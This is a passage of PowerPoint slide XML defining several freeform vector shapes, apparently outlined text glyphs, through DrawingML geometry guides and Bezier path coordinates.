                <p:tags r:id="rId77"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2654301" y="3308350"/>
              <a:ext cx="85725" cy="169863"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 199 w 203"/>
                <a:gd name="T1" fmla="*/ 30 h 388"/>
                <a:gd name="T2" fmla="*/ 203 w 203"/>
                <a:gd name="T3" fmla="*/ 18 h 388"/>
                <a:gd name="T4" fmla="*/ 186 w 203"/>
                <a:gd name="T5" fmla="*/ 0 h 388"/>
                <a:gd name="T6" fmla="*/ 168 w 203"/>
                <a:gd name="T7" fmla="*/ 14 h 388"/>
                <a:gd name="T8" fmla="*/ 4 w 203"/>
                <a:gd name="T9" fmla="*/ 358 h 388"/>
                <a:gd name="T10" fmla="*/ 0 w 203"/>
                <a:gd name="T11" fmla="*/ 370 h 388"/>
                <a:gd name="T12" fmla="*/ 17 w 203"/>
                <a:gd name="T13" fmla="*/ 388 h 388"/>
                <a:gd name="T14" fmla="*/ 35 w 203"/>
                <a:gd name="T15" fmla="*/ 374 h 388"/>
                <a:gd name="T16" fmla="*/ 199 w 203"/>
                <a:gd name="T17" fmla="*/ 3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388">
                  <a:moveTo>
                    <a:pt x="199" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="22"/>
                    <a:pt x="203" y="22"/>
                    <a:pt x="203" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="9"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="0"/>
                    <a:pt x="171" y="8"/>
                    <a:pt x="168" y="14"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4" y="358"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="379"/>
                    <a:pt x="7" y="388"/>
                    <a:pt x="17" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="388"/>
                    <a:pt x="32" y="380"/>
                    <a:pt x="35" y="374"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="199"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6" name="Freeform 177">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{070E74D0-A3EA-4A7E-B3AA-ECB1AE7270A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId78"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2755901" y="3327400"/>
              <a:ext cx="103188" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 215 w 244"/>
                <a:gd name="T1" fmla="*/ 30 h 308"/>
                <a:gd name="T2" fmla="*/ 244 w 244"/>
                <a:gd name="T3" fmla="*/ 15 h 308"/>
                <a:gd name="T4" fmla="*/ 223 w 244"/>
                <a:gd name="T5" fmla="*/ 0 h 308"/>
                <a:gd name="T6" fmla="*/ 173 w 244"/>
                <a:gd name="T7" fmla="*/ 0 h 308"/>
                <a:gd name="T8" fmla="*/ 152 w 244"/>
                <a:gd name="T9" fmla="*/ 15 h 308"/>
                <a:gd name="T10" fmla="*/ 180 w 244"/>
                <a:gd name="T11" fmla="*/ 30 h 308"/>
                <a:gd name="T12" fmla="*/ 142 w 244"/>
                <a:gd name="T13" fmla="*/ 183 h 308"/>
                <a:gd name="T14" fmla="*/ 122 w 244"/>
                <a:gd name="T15" fmla="*/ 269 h 308"/>
                <a:gd name="T16" fmla="*/ 122 w 244"/>
                <a:gd name="T17" fmla="*/ 269 h 308"/>
                <a:gd name="T18" fmla="*/ 113 w 244"/>
                <a:gd name="T19" fmla="*/ 224 h 308"/>
                <a:gd name="T20" fmla="*/ 64 w 244"/>
                <a:gd name="T21" fmla="*/ 30 h 308"/>
                <a:gd name="T22" fmla="*/ 92 w 244"/>
                <a:gd name="T23" fmla="*/ 15 h 308"/>
                <a:gd name="T24" fmla="*/ 72 w 244"/>
                <a:gd name="T25" fmla="*/ 0 h 308"/>
                <a:gd name="T26" fmla="*/ 21 w 244"/>
                <a:gd name="T27" fmla="*/ 0 h 308"/>
                <a:gd name="T28" fmla="*/ 0 w 244"/>
                <a:gd name="T29" fmla="*/ 15 h 308"/>
                <a:gd name="T30" fmla="*/ 29 w 244"/>
                <a:gd name="T31" fmla="*/ 30 h 308"/>
                <a:gd name="T32" fmla="*/ 95 w 244"/>
                <a:gd name="T33" fmla="*/ 289 h 308"/>
                <a:gd name="T34" fmla="*/ 122 w 244"/>
                <a:gd name="T35" fmla="*/ 308 h 308"/>
                <a:gd name="T36" fmla="*/ 150 w 244"/>
                <a:gd name="T37" fmla="*/ 290 h 308"/>
                <a:gd name="T38" fmla="*/ 215 w 244"/>
                <a:gd name="T39" fmla="*/ 3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4" h="308">
                  <a:moveTo>
                    <a:pt x="215" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="30"/>
                    <a:pt x="244" y="30"/>
                    <a:pt x="244" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="244" y="0"/>
                    <a:pt x="231" y="0"/>
                    <a:pt x="223" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="0"/>
                    <a:pt x="152" y="0"/>
                    <a:pt x="152" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="30"/>
                    <a:pt x="163" y="30"/>
                    <a:pt x="180" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="142" y="183"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="209"/>
                    <a:pt x="126" y="247"/>
                    <a:pt x="122" y="269"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="122" y="269"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="251"/>
                    <a:pt x="117" y="243"/>
                    <a:pt x="113" y="224"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="30"/>
                    <a:pt x="92" y="30"/>
                    <a:pt x="92" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="0"/>
                    <a:pt x="79" y="0"/>
                    <a:pt x="72" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="11" y="30"/>
                    <a:pt x="29" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="289"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="308"/>
                    <a:pt x="108" y="308"/>
                    <a:pt x="122" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="308"/>
                    <a:pt x="145" y="308"/>
                    <a:pt x="150" y="290"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="215"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7" name="Freeform 178">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58854B5F-80D7-4F9B-B8FD-ECD25332D1DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId79"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879726" y="3325813"/>
              <a:ext cx="79375" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 305"/>
                <a:gd name="T2" fmla="*/ 95 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 24 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 24 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 305"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 167 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 167 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 305"/>
                <a:gd name="T30" fmla="*/ 115 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 90 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 65 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 90 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 305"/>
                <a:gd name="T38" fmla="*/ 115 w 188"/>
                <a:gd name="T39" fmla="*/ 2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5" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="95"/>
                    <a:pt x="112" y="90"/>
                    <a:pt x="95" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="17" y="121"/>
                    <a:pt x="24" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="175" y="275"/>
                    <a:pt x="167" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="115" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="11"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="90" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="0"/>
                    <a:pt x="65" y="11"/>
                    <a:pt x="65" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="39"/>
                    <a:pt x="76" y="50"/>
                    <a:pt x="90" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="50"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115"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8" name="Freeform 179">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEEFF6EC-A40D-46DC-B0AA-EBE0D5662E5D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId80"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2981326" y="3363913"/>
              <a:ext cx="95250" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 94 w 226"/>
                <a:gd name="T1" fmla="*/ 126 h 218"/>
                <a:gd name="T2" fmla="*/ 184 w 226"/>
                <a:gd name="T3" fmla="*/ 31 h 218"/>
                <a:gd name="T4" fmla="*/ 205 w 226"/>
                <a:gd name="T5" fmla="*/ 53 h 218"/>
                <a:gd name="T6" fmla="*/ 226 w 226"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 179 w 226"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 94 w 226"/>
                <a:gd name="T11" fmla="*/ 41 h 218"/>
                <a:gd name="T12" fmla="*/ 94 w 226"/>
                <a:gd name="T13" fmla="*/ 24 h 218"/>
                <a:gd name="T14" fmla="*/ 74 w 226"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 19 w 226"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 226"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 19 w 226"/>
                <a:gd name="T21" fmla="*/ 34 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 226"/>
                <a:gd name="T23" fmla="*/ 34 h 218"/>
                <a:gd name="T24" fmla="*/ 60 w 226"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 19 w 226"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 226"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 19 w 226"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 150 w 226"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 170 w 226"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 150 w 226"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 94 w 226"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 94 w 226"/>
                <a:gd name="T41" fmla="*/ 12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6" h="218">
                  <a:moveTo>
                    <a:pt x="94" y="126"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="79"/>
                    <a:pt x="124" y="31"/>
                    <a:pt x="184" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="43"/>
                    <a:pt x="193" y="53"/>
                    <a:pt x="205" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="53"/>
                    <a:pt x="226" y="45"/>
                    <a:pt x="226" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="21"/>
                    <a:pt x="220" y="0"/>
                    <a:pt x="179" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="122" y="9"/>
                    <a:pt x="94" y="41"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="94" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="8"/>
                    <a:pt x="91" y="3"/>
                    <a:pt x="74" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="11" y="34"/>
                    <a:pt x="19" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="60" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="11" y="218"/>
                    <a:pt x="19" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="218"/>
                    <a:pt x="170" y="218"/>
                    <a:pt x="170" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="188"/>
                    <a:pt x="157" y="188"/>
                    <a:pt x="150" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="94" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94" y="12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9" name="Freeform 180">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8707C534-1E34-4C1A-980F-FD2053B60BA0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId81"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3089276" y="3338513"/>
              <a:ext cx="90488" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 211"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 211"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 199 w 211"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 211"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 98 w 211"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 98 w 211"/>
                <a:gd name="T11" fmla="*/ 21 h 279"/>
                <a:gd name="T12" fmla="*/ 81 w 211"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 63 w 211"/>
                <a:gd name="T15" fmla="*/ 21 h 279"/>
                <a:gd name="T16" fmla="*/ 63 w 211"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 20 w 211"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 19 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 63 w 211"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 63 w 211"/>
                <a:gd name="T27" fmla="*/ 214 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 211"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 211 w 211"/>
                <a:gd name="T31" fmla="*/ 214 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 211"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 136 w 211"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 98 w 211"/>
                <a:gd name="T39" fmla="*/ 211 h 279"/>
                <a:gd name="T40" fmla="*/ 98 w 211"/>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 h="279">
                  <a:moveTo>
                    <a:pt x="98" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="92"/>
                    <a:pt x="199" y="92"/>
                    <a:pt x="199" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="0"/>
                    <a:pt x="63" y="11"/>
                    <a:pt x="63" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="12" y="92"/>
                    <a:pt x="19" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="261"/>
                    <a:pt x="97" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="211" y="258"/>
                    <a:pt x="211" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="205"/>
                    <a:pt x="211" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="194"/>
                    <a:pt x="177" y="205"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="136" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98"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0" name="Freeform 181">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{011DA780-E8C4-458C-9003-EC653ABBFA45}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId82"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3197226" y="3365500"/>
              <a:ext cx="106363" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 172 w 249"/>
                <a:gd name="T1" fmla="*/ 199 h 218"/>
                <a:gd name="T2" fmla="*/ 192 w 249"/>
                <a:gd name="T3" fmla="*/ 215 h 218"/>
                <a:gd name="T4" fmla="*/ 228 w 249"/>
                <a:gd name="T5" fmla="*/ 215 h 218"/>
                <a:gd name="T6" fmla="*/ 249 w 249"/>
                <a:gd name="T7" fmla="*/ 200 h 218"/>
                <a:gd name="T8" fmla="*/ 229 w 249"/>
                <a:gd name="T9" fmla="*/ 185 h 218"/>
                <a:gd name="T10" fmla="*/ 207 w 249"/>
                <a:gd name="T11" fmla="*/ 185 h 218"/>
                <a:gd name="T12" fmla="*/ 207 w 249"/>
                <a:gd name="T13" fmla="*/ 21 h 218"/>
                <a:gd name="T14" fmla="*/ 187 w 249"/>
                <a:gd name="T15" fmla="*/ 0 h 218"/>
                <a:gd name="T16" fmla="*/ 150 w 249"/>
                <a:gd name="T17" fmla="*/ 0 h 218"/>
                <a:gd name="T18" fmla="*/ 130 w 249"/>
                <a:gd name="T19" fmla="*/ 16 h 218"/>
                <a:gd name="T20" fmla="*/ 150 w 249"/>
                <a:gd name="T21" fmla="*/ 31 h 218"/>
                <a:gd name="T22" fmla="*/ 172 w 249"/>
                <a:gd name="T23" fmla="*/ 31 h 218"/>
                <a:gd name="T24" fmla="*/ 172 w 249"/>
                <a:gd name="T25" fmla="*/ 137 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 249"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 76 w 249"/>
                <a:gd name="T29" fmla="*/ 156 h 218"/>
                <a:gd name="T30" fmla="*/ 76 w 249"/>
                <a:gd name="T31" fmla="*/ 21 h 218"/>
                <a:gd name="T32" fmla="*/ 56 w 249"/>
                <a:gd name="T33" fmla="*/ 0 h 218"/>
                <a:gd name="T34" fmla="*/ 20 w 249"/>
                <a:gd name="T35" fmla="*/ 0 h 218"/>
                <a:gd name="T36" fmla="*/ 0 w 249"/>
                <a:gd name="T37" fmla="*/ 16 h 218"/>
                <a:gd name="T38" fmla="*/ 20 w 249"/>
                <a:gd name="T39" fmla="*/ 31 h 218"/>
                <a:gd name="T40" fmla="*/ 42 w 249"/>
                <a:gd name="T41" fmla="*/ 31 h 218"/>
                <a:gd name="T42" fmla="*/ 42 w 249"/>
                <a:gd name="T43" fmla="*/ 159 h 218"/>
                <a:gd name="T44" fmla="*/ 113 w 249"/>
                <a:gd name="T45" fmla="*/ 218 h 218"/>
                <a:gd name="T46" fmla="*/ 172 w 249"/>
                <a:gd name="T47" fmla="*/ 19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9" h="218">
                  <a:moveTo>
                    <a:pt x="172" y="199"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="215"/>
                    <a:pt x="183" y="215"/>
                    <a:pt x="192" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="228" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="215"/>
                    <a:pt x="249" y="215"/>
                    <a:pt x="249" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="185"/>
                    <a:pt x="236" y="185"/>
                    <a:pt x="229" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="5"/>
                    <a:pt x="204" y="0"/>
                    <a:pt x="187" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="0"/>
                    <a:pt x="130" y="0"/>
                    <a:pt x="130" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="31"/>
                    <a:pt x="143" y="31"/>
                    <a:pt x="150" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="31"/>
                  </a:lnTo>
